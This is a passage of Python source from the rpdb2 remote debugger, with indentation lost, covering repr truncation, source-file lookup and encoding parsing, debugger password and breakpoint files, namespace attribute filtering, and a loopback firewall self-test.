return repr_str_raw(s, length, is_valid)
def repr_bytes(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'b' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str8(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 's' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str(s, length, encoding, is_valid):
try:
s = as_unicode(s, encoding, fstrict = True)
r = repr_unicode(s, length, is_valid)
return r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_unicode(s, length, is_valid):
index = [2, 1][is_py3k()]
rs = ''
for c in s:
if len(rs) > length:
is_valid[0] = False
rs += '...'
break
if ord(c) < 128:
rs += repr(c)[index: -1]
else:
rs += c
if not "'" in rs:
return as_unicode("u'%s'" % rs)
if not '"' in rs:
return as_unicode('u"%s"' % rs)
return as_unicode("u'%s'" % rs.replace("'", "\\'"))
def repr_str_raw(s, length, is_valid):
if is_unicode(s):
eli = ELLIPSIS_UNICODE
else:
eli = ELLIPSIS_BYTES
if len(s) > length:
is_valid[0] = False
s = s[: length] + eli
return as_unicode(repr(s))
def repr_base(v, length, is_valid):
r = repr(v)
if len(r) > length:
is_valid[0] = False
r = r[: length] + '...'
return as_unicode(r)
def repr_ltd(x, length, encoding, is_valid = [True]):
try:
length = max(0, length)
try:
if isinstance(x, frozenset):
return repr_list('frozenset([%s])', x, length, encoding, is_valid)
if isinstance(x, set):
return repr_list('set([%s])', x, length, encoding, is_valid)
except NameError:
pass
if isinstance(x, sets.Set):
return repr_list('sets.Set([%s])', x, length, encoding, is_valid)
if isinstance(x, sets.ImmutableSet):
return repr_list('sets.ImmutableSet([%s])', x, length, encoding, is_valid)
if isinstance(x, list):
return repr_list('[%s]', x, length, encoding, is_valid)
if isinstance(x, tuple):
return repr_list('(%s)', x, length, encoding, is_valid)
if isinstance(x, dict):
return repr_dict('{%s}', x, length, encoding, is_valid)
if encoding == ENCODING_RAW_I and [True for t in [str, unicode, bytearray, bytes, str8] if t is type(x)]:
return repr_str_raw(x, length, is_valid)
if type(x) is unicode:
return repr_unicode(x, length, is_valid)
if type(x) is bytearray:
return repr_bytearray(x, length, encoding, is_valid)
if type(x) is bytes:
return repr_bytes(x, length, encoding, is_valid)
if type(x) is str8:
return repr_str8(x, length, encoding, is_valid)
if type(x) is str:
return repr_str(x, length, encoding, is_valid)
if [True for t in [bool, int, float, long, type(None)] if t is type(x)]:
return repr_base(x, length, is_valid)
is_valid[0] = False
y = safe_repr(x)[: length]
if len(y) == length:
y += '...'
if encoding == ENCODING_RAW_I:
encoding = 'utf-8'
try:
y = as_unicode(y, encoding, fstrict = True)
return y
except:
pass
encoding = sys.getfilesystemencoding()
y = as_unicode(y, encoding)
return y
except:
print_debug_exception()
return as_unicode('N/A')
def print_debug(_str):
if not g_fDebug:
return
t = time.time()
l = time.localtime(t)
s = time.strftime('%H:%M:%S', l) + '.%03d' % ((t - int(t)) * 1000)
f = sys._getframe(1)
filename = os.path.basename(f.f_code.co_filename)
lineno = f.f_lineno
name = f.f_code.co_name
str = '%s %s:%d in %s: %s' % (s, filename, lineno, name, _str)
_print(str, sys.__stderr__)
def print_debug_exception(fForce = False):
"""
Print exceptions to stdout when in debug mode.
"""
if not g_fDebug and not fForce:
return
(t, v, tb) = sys.exc_info()
print_exception(t, v, tb, fForce)
class CFileWrapper:
def __init__(self, f):
self.m_f = f
def write(self, s):
_print(s, self.m_f, feol = False)
def __getattr__(self, name):
return self.m_f.__getattr__(name)
def print_exception(t, v, tb, fForce = False):
"""
Print exceptions to stderr when in debug mode.
"""
if not g_fDebug and not fForce:
return
try:
g_traceback_lock.acquire()
traceback.print_exception(t, v, tb, file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
def print_stack():
"""
Print exceptions to stdout when in debug mode.
"""
if g_fDebug == True:
try:
g_traceback_lock.acquire()
traceback.print_stack(file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
#
# myisfile() is similar to os.path.isfile() but also works with
# Python eggs.
#
def myisfile(path):
try:
mygetfile(path, False)
return True
except:
return False
#
# Read a file even if inside a Python egg.
#
def mygetfile(path, fread_file = True):
if os.path.isfile(path):
if not fread_file:
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'r'
else:
mode = 'rb'
f = open(path, mode)
data = f.read()
f.close()
return data
d = os.path.dirname(path)
while True:
if os.path.exists(d):
break
_d = os.path.dirname(d)
if _d in [d, '']:
raise IOError
d = _d
if not zipfile.is_zipfile(d):
raise IOError
z = zipimport.zipimporter(d)
try:
data = z.get_data(path[len(d) + 1:])
return data
except:
raise IOError
def split_command_line_path_filename_args(command_line):
"""
Split command line to a 3 elements tuple (path, filename, args)
"""
command_line = command_line.strip()
if len(command_line) == 0:
return ('', '', '')
if myisfile(command_line):
(_path, _filename) = split_path(command_line)
return (_path, _filename, '')
if command_line[0] in ['"', "'"]:
_command_line = command_line[1:]
i = _command_line.find(command_line[0])
if i == -1:
(_path, filename) = split_path(_command_line)
return (_path, filename, '')
else:
(_path, filename) = split_path(_command_line[: i])
args = _command_line[i + 1:].strip()
return (_path, filename, args)
else:
i = command_line.find(' ')
if i == -1:
(_path, filename) = split_path(command_line)
return (_path, filename, '')
else:
args = command_line[i + 1:].strip()
(_path, filename) = split_path(command_line[: i])
return (_path, filename, args)
def split_path(path):
(_path, filename) = os.path.split(path)
#
# Make sure path separator (e.g. '/') ends the splitted path if it was in
# the original path.
#
if (_path[-1:] not in [os.path.sep, os.path.altsep]) and \
(path[len(_path): len(_path) + 1] in [os.path.sep, os.path.altsep]):
_path = _path + path[len(_path): len(_path) + 1]
return (_path, filename)
def my_os_path_join(dirname, basename):
if is_py3k() or (type(dirname) == str and type(basename) == str):
return os.path.join(dirname, basename)
encoding = sys.getfilesystemencoding()
if type(dirname) == str:
dirname = dirname.decode(encoding)
if type(basename) == str:
basename = basename.decode(encoding)
return os.path.join(dirname, basename)
def calc_frame_path(frame):
globals_filename = frame.f_globals.get('__file__', None)
filename = frame.f_code.co_filename
if filename.startswith('<'):
if globals_filename == None:
return filename
else:
filename = CalcScriptName(os.path.basename(globals_filename))
if filename in g_frames_path:
return g_frames_path[filename]
if globals_filename != None:
dirname = os.path.dirname(globals_filename)
basename = os.path.basename(filename)
path = my_os_path_join(dirname, basename)
if os.path.isabs(path):
abspath = my_abspath(path)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(path, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
pass
if os.path.isabs(filename):
abspath = my_abspath(filename)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(filename, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
lowered = winlower(filename)
return lowered
def my_abspath(path):
"""
We need our own little version of os.path.abspath since the original
code imports modules in the 'nt' code path which can cause our debugger
to deadlock in unexpected locations.
"""
if path[:1] == '<':
#
# 'path' may also be '<stdin>' in which case it is left untouched.
#
return path
if os.name == 'nt':
return my_abspath1(path)
return os.path.abspath(path)
#
# MOD
#
def my_abspath1(path):
"""
Modification of ntpath.abspath() that avoids doing an import.
"""
if path:
try:
path = _getfullpathname(path)
except WindowsError:
pass
else:
try:
path = getcwd()
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
path = getcwdu()
np = os.path.normpath(path)
if (len(np) >= 2) and (np[1:2] == ':'):
np = np[:1].upper() + np[1:]
return np
def IsPythonSourceFile(path):
if path.endswith(PYTHON_FILE_EXTENSION):
return True
if path.endswith(PYTHONW_FILE_EXTENSION):
return True
path = g_found_unicode_files.get(path, path)
for lineno in range(1, 10):
line = get_source_line(path, lineno)
if line.startswith('#!') and 'python' in line:
return True
if is_py3k():
#
# py3k does not have compiler.parseFile, so return
# True anyway...
#
return True
try:
compiler.parseFile(path)
return True
except:
return False
def CalcModuleName(filename):
_basename = os.path.basename(filename)
(modulename, ext) = os.path.splitext(_basename)
if ext in PYTHON_EXT_LIST:
return modulename
return _basename
def CalcScriptName(filename, fAllowAnyExt = True):
if filename.endswith(PYTHON_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_SO_EXTENSION):
scriptname = filename[:-3] + PYTHON_FILE_EXTENSION
return scriptname
if filename[:-1].endswith(PYTHON_FILE_EXTENSION):
scriptname = filename[:-1]
return scriptname
if fAllowAnyExt:
return filename
scriptname = filename + PYTHON_FILE_EXTENSION
return scriptname
def FindModuleDir(module_name):
if module_name == '':
raise IOError
dot_index = module_name.rfind('.')
if dot_index != -1:
parent = module_name[: dot_index]
child = module_name[dot_index + 1:]
else:
parent = ''
child = module_name
m = sys.modules[module_name]
if not hasattr(m, '__file__') or m.__file__ == None:
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
if not os.path.isabs(m.__file__):
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
(root, ext) = os.path.splitext(m.__file__)
if root.endswith('__init__'):
root = os.path.dirname(root)
abspath = my_abspath(root)
lowered = winlower(abspath)
return lowered
def FindFileAsModule(filename):
lowered = winlower(filename)
(root, ext) = os.path.splitext(lowered)
root_dotted = root.replace('\\', '.').replace('/', '.').replace(':', '.')
match_list = []
for (module_name, m) in list(sys.modules.items()):
lowered_module_name = winlower(module_name)
if (root_dotted + '.').startswith(lowered_module_name + '.'):
match_list.append((len(module_name), module_name))
if lowered_module_name == root_dotted:
break
match_list.sort()
match_list.reverse()
for (matched_len, matched_module) in match_list:
try:
module_dir = FindModuleDir(matched_module)
except IOError:
continue
suffix = root[matched_len:]
if suffix == '':
path = module_dir + ext
else:
path = my_os_path_join(module_dir, suffix.strip('\\')) + ext
scriptname = CalcScriptName(path, fAllowAnyExt = False)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
raise IOError
def getcwd():
try:
return os.getcwd()
except UnicodeDecodeError:
print_debug_exception(True)
raise
def getcwdu():
if hasattr(os, 'getcwdu'):
return os.getcwdu()
return getcwd()
def FindFile(
filename,
sources_paths = [],
fModules = False,
fAllowAnyExt = True
):
"""
FindFile looks for the full path of a script in a rather non-strict
and human like behavior.
ENCODING:
filename should be either Unicode or encoded with sys.getfilesystemencoding()!
Returned value is encoded with sys.getfilesystemencoding().
It will always look for .py or .pyw files even if a .pyc or no
extension is given.
1. It will check against loaded modules if asked.
1. full path (if exists).
2. sources_paths.
2. current path.
3. PYTHONPATH
4. PATH
"""
if filename in g_found_unicode_files:
return filename
if filename.startswith('<'):
raise IOError
filename = filename.strip('\'"')
filename = os.path.expanduser(filename)
if fModules and not (os.path.isabs(filename) or filename.startswith('.')):
try:
return winlower(FindFileAsModule(filename))
except IOError:
pass
if fAllowAnyExt:
try:
abspath = FindFile(
filename,
sources_paths,
fModules = False,
fAllowAnyExt = False
)
return abspath
except IOError:
pass
if os.path.isabs(filename) or filename.startswith('.'):
try:
scriptname = None
abspath = my_abspath(filename)
lowered = winlower(abspath)
scriptname = CalcScriptName(lowered, fAllowAnyExt)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
scriptname = None
raise IOError
finally:
if not is_py3k() and is_unicode(scriptname):
fse = sys.getfilesystemencoding()
_l = as_string(scriptname, fse)
if '?' in _l:
g_found_unicode_files[_l] = scriptname
return _l
scriptname = CalcScriptName(filename, fAllowAnyExt)
try:
cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
cwd = [getcwdu()]
env_path = os.environ['PATH']
paths = sources_paths + cwd + g_initial_cwd + sys.path + env_path.split(os.pathsep)
try:
lowered = None
for p in paths:
f = my_os_path_join(p, scriptname)
abspath = my_abspath(f)
lowered = winlower(abspath)
if myisfile(lowered):
return lowered
#
# Check .pyw files
#
lowered += 'w'
if lowered.endswith(PYTHONW_FILE_EXTENSION) and myisfile(lowered):
return lowered
lowered = None
raise IOError
finally:
if not is_py3k() and is_unicode(lowered):
fse = sys.getfilesystemencoding()
_l = as_string(lowered, fse)
if '?' in _l:
g_found_unicode_files[_l] = lowered
return _l
def IsFileInPath(filename):
if filename == '':
return False
try:
FindFile(filename)
return True
except IOError:
return False
def IsPrefixInEnviron(_str):
for e in os.environ.keys():
if e.startswith(_str):
return True
return False
def CalcTerminalCommand():
"""
Calc the unix command to start a new terminal, for example: xterm
"""
if RPDBTERM in os.environ:
term = os.environ[RPDBTERM]
if IsFileInPath(term):
return term
if COLORTERM in os.environ:
term = os.environ[COLORTERM]
if IsFileInPath(term):
return term
if IsPrefixInEnviron(KDE_PREFIX):
(s, term) = commands.getstatusoutput(KDE_DEFAULT_TERM_QUERY)
if (s == 0) and IsFileInPath(term):
return term
elif IsPrefixInEnviron(GNOME_PREFIX):
if IsFileInPath(GNOME_DEFAULT_TERM):
return GNOME_DEFAULT_TERM
if IsFileInPath(XTERM):
return XTERM
if IsFileInPath(RXVT):
return RXVT
raise SpawnUnsupported
def CalcMacTerminalCommand(command):
"""
Calculate what to put in popen to start a given script.
Starts a tiny Applescript that performs the script action.
"""
#
# Quoting is a bit tricky; we do it step by step.
# Make Applescript string: put backslashes before double quotes and
# backslashes.
#
command = command.replace('\\', '\\\\').replace('"', '\\"')
#
# Make complete Applescript command.
#
command = 'tell application "Terminal" to do script "%s"' % command
#
# Make a shell single quoted string (put backslashed single quotes
# outside string).
#
command = command.replace("'", "'\\''")
#
# Make complete shell command.
#
return "osascript -e '%s'" % command
def winlower(path):
"""
return lowercase version of 'path' on NT systems.
On NT filenames are case insensitive so lowercase filenames
for comparison purposes on NT.
"""
if os.name == 'nt':
return path.lower()
return path
def source_provider_blender(filename):
"""
Return source code of the file referred by filename.
Support for debugging of Blender Python scripts.
Blender scripts are not always saved on disk, and their
source has to be queried directly from the Blender API.
http://www.blender.org
"""
if not 'Blender.Text' in sys.modules:
raise IOError
if filename.startswith('<'):
#
# This specifies blender source whose source is not
# available.
#
raise IOError(BLENDER_SOURCE_NOT_AVAILABLE)
_filename = os.path.basename(filename)
try:
t = sys.modules['Blender.Text'].get(_filename)
lines = t.asLines()
return '\n'.join(lines) + '\n'
except NameError:
f = winlower(_filename)
tlist = sys.modules['Blender.Text'].get()
t = None
for _t in tlist:
n = winlower(_t.getName())
if n == f:
t = _t
break
if t == None:
#
# filename does not specify a blender file. Raise IOError
# so that search can continue on file system.
#
raise IOError
lines = t.asLines()
return '\n'.join(lines) + '\n'
def source_provider_filesystem(filename):
l = mygetfile(filename)
if l[:3] == as_bytes(ENCODING_UTF8_PREFIX_1):
l = l[3:]
return l
def source_provider(filename):
source = None
ffilesystem = False
try:
if g_source_provider_aux != None:
source = g_source_provider_aux(filename)
except IOError:
v = sys.exc_info()[1]
if SOURCE_NOT_AVAILABLE in v.args:
raise
try:
if source == None:
source = source_provider_blender(filename)
except IOError:
v = sys.exc_info()[1]
if BLENDER_SOURCE_NOT_AVAILABLE in v.args:
raise
if source == None:
source = source_provider_filesystem(filename)
ffilesystem = True
encoding = ParseEncoding(source)
if not is_unicode(source):
source = as_unicode(source, encoding)
return source, encoding, ffilesystem
def lines_cache(filename):
filename = g_found_unicode_files.get(filename, filename)
if filename in g_lines_cache:
return g_lines_cache[filename]
(source, encoding, ffilesystem) = source_provider(filename)
source = source.replace(as_unicode('\r\n'), as_unicode('\n'))
lines = source.split(as_unicode('\n'))
g_lines_cache[filename] = (lines, encoding, ffilesystem)
return (lines, encoding, ffilesystem)
def get_source(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
source = as_unicode('\n').join(lines)
return (source, encoding)
def get_source_line(filename, lineno):
(lines, encoding, ffilesystem) = lines_cache(filename)
if lineno > len(lines):
return as_unicode('')
return lines[lineno - 1] + as_unicode('\n')
def is_provider_filesystem(filename):
try:
(lines, encoding, ffilesystem) = lines_cache(filename)
return ffilesystem
except IOError:
v = sys.exc_info()[1]
return not (BLENDER_SOURCE_NOT_AVAILABLE in v.args or SOURCE_NOT_AVAILABLE in v.args)
def get_file_encoding(filename):
(lines, encoding, ffilesystem) = lines_cache(filename)
return encoding
def ParseLineEncoding(l):
if l.startswith('# -*- coding: '):
e = l[len('# -*- coding: '):].split()[0]
return e
if l.startswith('# vim:fileencoding='):
e = l[len('# vim:fileencoding='):].strip()
return e
return None
def ParseEncoding(txt):
"""
Parse document encoding according to:
http://docs.python.org/ref/encodings.html
"""
eol = '\n'
if not is_unicode(txt):
eol = as_bytes('\n')
l = txt.split(eol, 20)[:-1]
for line in l:
line = as_unicode(line)
encoding = ParseLineEncoding(line)
if encoding is not None:
try:
codecs.lookup(encoding)
return encoding
except:
return 'utf-8'
return 'utf-8'
def _getpid():
try:
return os.getpid()
except:
return -1
def calcURL(host, port):
"""
Form HTTP URL from 'host' and 'port' arguments.
"""
url = "http://" + str(host) + ":" + str(port)
return url
def GetSocketError(e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
def ControlRate(t_last_call, max_rate):
"""
Limits rate at which this function is called by sleeping.
Returns the time of invocation.
"""
p = 1.0 / max_rate
t_current = time.time()
dt = t_current - t_last_call
if dt < p:
time.sleep(p - dt)
return t_current
def generate_rid():
"""
Return a 7 digits random id.
"""
rid = repr(random.randint(1000000, 9999999))
rid = as_unicode(rid)
return rid
def generate_random_char(_str):
"""
Return a random character from string argument.
"""
if _str == '':
return ''
i = random.randint(0, len(_str) - 1)
return _str[i]
def generate_random_password():
"""
Generate an 8 characters long password.
"""
s = 'abdefghijmnqrt' + 'ABDEFGHJLMNQRTY'
ds = '23456789_' + s
_rpdb2_pwd = generate_random_char(s)
for i in range(0, 7):
_rpdb2_pwd += generate_random_char(ds)
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
return _rpdb2_pwd
def is_valid_pwd(_rpdb2_pwd):
if _rpdb2_pwd in [None, '']:
return False
try:
if not is_unicode(_rpdb2_pwd):
_rpdb2_pwd = _rpdb2_pwd.decode('ascii')
_rpdb2_pwd.encode('ascii')
except:
return False
for c in _rpdb2_pwd:
if c.isalnum():
continue
if c == '_':
continue
return False
return True
def is_encryption_supported():
"""
Is the Crypto module imported/available.
"""
return 'DES' in globals()
def calc_suffix(_str, n):
"""
Return an n charaters suffix of the argument string of the form
'...suffix'.
"""
if len(_str) <= n:
return _str
return '...' + _str[-(n - 3):]
def calc_prefix(_str, n):
"""
Return an n charaters prefix of the argument string of the form
'prefix...'.
"""
if len(_str) <= n:
return _str
return _str[: (n - 3)] + '...'
def create_rpdb_settings_folder():
"""
Create the settings folder on Posix systems:
'~/.rpdb2_settings' with mode 700.
"""
if os.name != POSIX:
return
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_SETTINGS_FOLDER)
if not os.path.exists(rsf):
os.mkdir(rsf, int('0700', 8))
pwds = os.path.join(home, RPDB_PWD_FOLDER)
if not os.path.exists(pwds):
os.mkdir(pwds, int('0700', 8))
bpl = os.path.join(home, RPDB_BPL_FOLDER)
if not os.path.exists(bpl):
os.mkdir(bpl, int('0700', 8))
def cleanup_bpl_folder(path):
if random.randint(0, 10) > 0:
return
l = os.listdir(path)
if len(l) < MAX_BPL_FILES:
return
try:
ll = [(os.stat(os.path.join(path, f))[stat.ST_ATIME], f) for f in l]
except:
return
ll.sort()
for (t, f) in ll[: -MAX_BPL_FILES]:
try:
os.remove(os.path.join(path, f))
except:
pass
def calc_bpl_filename(filename):
key = as_bytes(filename)
tmp_filename = hmac.new(key).hexdigest()[:10]
if os.name == POSIX:
home = os.path.expanduser('~')
bpldir = os.path.join(home, RPDB_BPL_FOLDER)
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
#
# gettempdir() is used since it works with unicode user names on
# Windows.
#
tmpdir = tempfile.gettempdir()
bpldir = os.path.join(tmpdir, RPDB_BPL_FOLDER_NT)
if not os.path.exists(bpldir):
#
# Folder creation is done here since this is a temp folder.
#
try:
os.mkdir(bpldir, int('0700', 8))
except:
print_debug_exception()
raise CException
else:
cleanup_bpl_folder(bpldir)
path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
return path
def calc_pwd_file_path(rid):
"""
Calc password file path for Posix systems:
'~/.rpdb2_settings/<rid>'
"""
home = os.path.expanduser('~')
rsf = os.path.join(home, RPDB_PWD_FOLDER)
pwd_file_path = os.path.join(rsf, rid)
return pwd_file_path
def create_pwd_file(rid, _rpdb2_pwd):
"""
Create password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
fd = os.open(path, os.O_WRONLY | os.O_CREAT, int('0600', 8))
os.write(fd, as_bytes(_rpdb2_pwd))
os.close(fd)
def read_pwd_file(rid):
"""
Read password from password file for Posix systems.
"""
assert(os.name == POSIX)
path = calc_pwd_file_path(rid)
p = open(path, 'r')
_rpdb2_pwd = p.read()
p.close()
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return _rpdb2_pwd
def delete_pwd_file(rid):
"""
Delete password file for Posix systems.
"""
if os.name != POSIX:
return
path = calc_pwd_file_path(rid)
try:
os.remove(path)
except:
pass
def CalcUserShell():
try:
s = os.getenv('SHELL')
if s != None:
return s
import getpass
username = getpass.getuser()
f = open('/etc/passwd', 'r')
l = f.read()
f.close()
ll = l.split('\n')
d = dict([(e.split(':', 1)[0], e.split(':')[-1]) for e in ll])
return d[username]
except:
return 'sh'
def IsFilteredAttribute(a):
if not (a.startswith('__') and a.endswith('__')):
return False
if a in ['__class__', '__bases__', '__file__', '__doc__', '__name__', '__all__', '__builtins__']:
return False
return True
def IsFilteredAttribute2(r, a):
try:
o = getattr(r, a)
r = parse_type(type(o))
if 'function' in r or 'method' in r or r == 'type':
return True
return False
except:
return False
def CalcFilteredDir(r, filter_level):
d = dir(r)
if 'finfo' in d and parse_type(type(r)) == 'mp_request':
#
# Workaround mod_python segfault in type(req.finfo) by
# removing this attribute from the namespace viewer.
#
d.remove('finfo')
if filter_level == 0:
return d
fd = [a for a in d if not IsFilteredAttribute(a)]
return fd
def CalcIdentity(r, filter_level):
if filter_level == 0:
return r
if not hasattr(r, 'im_func'):
return r
return r.im_func
def getattr_nothrow(o, a):
try:
return getattr(o, a)
except AttributeError:
return ERROR_NO_ATTRIBUTE
except:
print_debug_exception()
return ERROR_NO_ATTRIBUTE
def calc_attribute_list(r, filter_level):
d = CalcFilteredDir(r, filter_level)
rs = set(d)
c = getattr_nothrow(r, '__class__')
if not c is ERROR_NO_ATTRIBUTE:
d = CalcFilteredDir(c, False)
cs = set(d)
s = rs & cs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(c, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
bl = getattr_nothrow(r, '__bases__')
if type(bl) == tuple:
for b in bl:
d = CalcFilteredDir(b, False)
bs = set(d)
s = rs & bs
for e in s:
o1 = getattr_nothrow(r, e)
o2 = getattr_nothrow(b, e)
if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
rs.discard(e)
try:
if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
rs.discard(e)
except:
pass
l = [a for a in rs if (filter_level < 2 or not IsFilteredAttribute2(r, a))]
if hasattr(r, '__class__') and not '__class__' in l:
l = ['__class__'] + l
if hasattr(r, '__bases__') and not '__bases__' in l:
l = ['__bases__'] + l
al = [a for a in l if hasattr(r, a)]
return al
class _RPDB2_FindRepr:
def __init__(self, o, repr_limit):
self.m_object = o
self.m_repr_limit = repr_limit
def __getitem__(self, key):
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
if isinstance(self.m_object, dict):
return self.m_object[i]
return i
index += 1
if index > MAX_SORTABLE_LENGTH:
return None
def __setitem__(self, key, value):
if not isinstance(self.m_object, dict):
return
index = 0
for i in self.m_object:
if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
self.m_object[i] = value
return
index += 1
if index > MAX_SORTABLE_LENGTH:
return
#
# Since on Python 3000 the comparison of different types raises exceptions and
# the __cmp__ method was removed, sorting of namespace items is based on
# lexicographic order except for numbers which are sorted normally and appear
# before all other types.
#
def sort(s):
if sys.version_info[:2] == (2, 3):
#
# On Python 2.3 the key parameter is not supported.
#
s.sort(sort_cmp)
return
s.sort(key = sort_key)
def sort_key(e):
if is_py3k() and isinstance(e, numbers.Number):
return (0, e)
if not is_py3k() and operator.isNumberType(e):
return (0, e)
return (1, repr_ltd(e, 256, encoding = ENCODING_RAW_I))
def sort_cmp(x, y):
skx = sort_key(x)
sky = sort_key(y)
return cmp(skx, sky)
def recalc_sys_path(old_pythonpath):
opl = old_pythonpath.split(os.path.pathsep)
del sys.path[1: 1 + len(opl)]
pythonpath = os.environ.get('PYTHONPATH', '')
ppl = pythonpath.split(os.path.pathsep)
for i, p in enumerate(ppl):
abspath = my_abspath(p)
lowered = winlower(abspath)
sys.path.insert(1 + i, lowered)
def calc_signame(signum):
for k, v in vars(signal).items():
if not k.startswith('SIG') or k in ['SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX']:
continue
if v == signum:
return k
return '?'
#
# Similar to traceback.extract_stack() but fixes path with calc_frame_path()
#
def my_extract_stack(f):
if f == None:
return []
try:
g_traceback_lock.acquire()
_s = traceback.extract_stack(f)
finally:
g_traceback_lock.release()
_s.reverse()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(f), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
f = f.f_back
if f == None:
break
s.reverse()
return s
#
# Similar to traceback.extract_tb() but fixes path with calc_frame_path()
#
def my_extract_tb(tb):
try:
g_traceback_lock.acquire()
_s = traceback.extract_tb(tb)
finally:
g_traceback_lock.release()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(tb.tb_frame), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
tb = tb.tb_next
if tb == None:
break
return s
def get_traceback(frame, ctx):
if is_py3k():
if ctx.get_exc_info() != None:
return ctx.get_exc_info()[2]
else:
if frame.f_exc_traceback != None:
return frame.f_exc_traceback
locals = copy.copy(frame.f_locals)
if not 'traceback' in locals:
return None
tb = locals['traceback']
if dir(tb) == ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
return tb
class CFirewallTest:
m_port = None
m_thread_server = None
m_thread_client = None
m_lock = threading.RLock()
def __init__(self, fremote = False, timeout = 4):
if fremote:
self.m_loopback = ''
else:
self.m_loopback = LOOPBACK
self.m_timeout = timeout
self.m_result = None
self.m_last_server_error = None
self.m_last_client_error = None
def run(self):
CFirewallTest.m_lock.acquire()
try:
#
# If either the server or client are alive after a timeout
# it means they are blocked by a firewall. Return False.
#
server = CFirewallTest.m_thread_server
if server != None and thread_is_alive(server):
server.join(self.m_timeout * 1.5)
if thread_is_alive(server):
return False
client = CFirewallTest.m_thread_client
if client != None and thread_is_alive(client):
client.join(self.m_timeout * 1.5)
if thread_is_alive(client):
return False
CFirewallTest.m_port = None
self.m_result = None
t0 = time.time()
server = threading.Thread(target = self.__server)
server.start()
CFirewallTest.m_thread_server = server
#
# If server exited or failed to setup after a timeout
# it means it was blocked by a firewall.
#
while CFirewallTest.m_port == None and thread_is_alive(server):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
if not thread_is_alive(server):
return False
t0 = time.time()
client = threading.Thread(target = self.__client)
client.start()
CFirewallTest.m_thread_client = client
while self.m_result == None and thread_is_alive(client):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
return self.m_result
finally:
CFirewallTest.m_lock.release()
def __client(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
try:
try:
s.connect((LOOPBACK, CFirewallTest.m_port))
s.send(as_bytes('Hello, world'))
data = self.__recv(s, 1024)
self.m_result = True
except socket.error:
e = sys.exc_info()[1]
self.m_last_client_error = e
self.m_result = False
finally:
s.close()
def __server(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
if os.name == POSIX:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = SERVER_PORT_RANGE_START
while True:
try:
s.bind((self.m_loopback, port))
break
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EADDRINUSE:
self.m_last_server_error = e
s.close()
return
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
self.m_last_server_error = e
s.close()
return
port += 1
CFirewallTest.m_port = port
try:
try:
conn = None
s.listen(1)
conn, addr = s.accept()
while True:
data = self.__recv(conn, 1024)
if not data:
return
conn.send(data)
except socket.error:
